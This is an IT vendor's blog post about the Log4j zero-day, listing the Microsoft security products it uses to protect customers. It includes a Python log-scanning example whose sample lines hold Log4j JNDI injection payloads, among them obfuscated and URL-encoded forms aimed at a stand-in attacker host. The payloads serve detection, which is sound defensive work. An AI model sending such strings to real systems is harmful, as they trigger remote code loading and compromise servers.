Posted on December 15, 2021
Hackers are making thousands of attempts to exploit systems through a flaw in Log4j. The Log4j zero-day has been hitting headlines and setting the internet on fire: it is a vulnerability in a widely used logging library that has had security responders working around the clock to patch, as it is thought to affect many mainstream services.
What is Log4j?
A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and comes with a severity score of 10 out of 10.
The library is developed as an open-source project by the Apache Software Foundation and is a key Java logging framework. It is widely used in many applications and is present in many services as a dependency, including enterprise applications, custom applications developed within an organisation, and numerous cloud services.
An application is vulnerable if it accepts untrusted user input and passes it to a vulnerable version of the Log4j logging library.
What is Atech doing to protect its customers against Log4j?
- For customers that have Microsoft Defender Antivirus
We always ensure we turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.
Microsoft Defender Antivirus detects components and behaviours related to this threat.
- For customers that have Defender for Cloud
Microsoft Defender for Cloud detects exploitation and post-exploitation activity related to CVE-2021-44228 and blocks any attacker trying to breach and compromise your organisation's security.
We have added the CVE number to the Inventory tools available in Defender for Cloud and are running searches against all managed devices within the organisation to identify exposure to this vulnerability.
- For customers with Microsoft Sentinel
We proactively run queries that look for the exploit and help us detect any attempts, so we can block or prevent this sort of attack in your organisation.
These hunting queries look for possible attempts to exploit a remote code execution vulnerability in the Apache Log4j component. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.
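The kind of hunting logic described above, as an added Python example that is not Atech's or Microsoft's query: it scans web-server access log lines for Log4j lookup strings, undoing the URL-encoding and nested-lookup tricks that are used to hide them from naive string matching. The log format, the sample lines and the documentation address 203.0.113.10 are constructed for the example.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample web-server access log lines (not taken from the original post).
# 203.0.113.10 is a documentation address standing in for an attacker-controlled host.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [15/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [15/Dec/2021:10:01:09 +0000] "GET /blog/log4j-advisory HTTP/1.1" 200 9001 "-" "curl/7.79"',
    '198.51.100.7 - - [15/Dec/2021:10:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.7 - - [15/Dec/2021:10:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${lower:n}di:ldap://203.0.113.10/a}"',
    '198.51.100.8 - - [15/Dec/2021:10:02:20 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1" 404 0 "-" "-"',
]

# Nested lookups that resolve to a literal: "${lower:j}" -> "j", "${upper:N}" -> "N",
# "${::-d}" -> "d", "${env:NOT_SET:-i}" -> "i". Collapsing them exposes the real string.
_NESTED_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE
)
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        collapsed = _NESTED_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookup_attempts(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line that carries a ${jndi:...} lookup after decoding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        decoded = urllib.parse.unquote(line)       # undo %-encoding used to evade simple filters
        normalized = normalize_lookups(decoded)    # undo ${lower:..} / ${::-..} style nesting
        if _JNDI_LOOKUP.search(normalized):
            hits.append({"line": number, "normalized": normalized, "raw": line})
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookup_attempts(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['normalized']}")
```

Lines 3, 4 and 5 of the sample are flagged while the two benign lines (one of which merely mentions "log4j" in a path) are not; the normalized form is kept in each hit so an analyst can see what the decoded string resolved to.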
- For customers with Azure Firewall Premium
The good news is that customers using Azure Firewall Premium have enhanced protection against the Log4j RCE vulnerability (CVE-2021-44228) and its exploitation.
Azure Firewall Premium IDPS (Intrusion Detection and Prevention System) inspects all east-west traffic and outbound traffic to the internet.
The vulnerability rulesets are continuously updated by Microsoft and have included signatures for CVE-2021-44228 across different scenarios, including the UDP, TCP and HTTP/S protocols, since December 10th, 2021.
- For customers with Azure Web Application Firewall (WAF)
In response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0 and 1.1, which are available for Azure Front Door global deployments.
Microsoft has updated rule 944240 “Remote Command Execution” under Managed Rules to help detect and mitigate this vulnerability by inspecting request headers, URI and body. This rule is already enabled by default in block mode for all existing WAF Default Rule Set configurations.
Customers using WAF Managed Rules have therefore already received enhanced protection for the Log4j2 vulnerability (CVE-2021-44228); no additional action is needed.
Atech, as a security solutions provider, has proactively audited internal systems and customer environments to take action where required and ensure no customers are exposed to this vulnerability.
Our recommendation for Log4j
Are you still worried about your security posture?
If you are not already using the Microsoft 365 Defender Suite to protect your organisation, don’t wait any longer. Reach out to us and we will help you to design and implement military-grade security in your business using industry-leading solutions backed by our tailor-made service.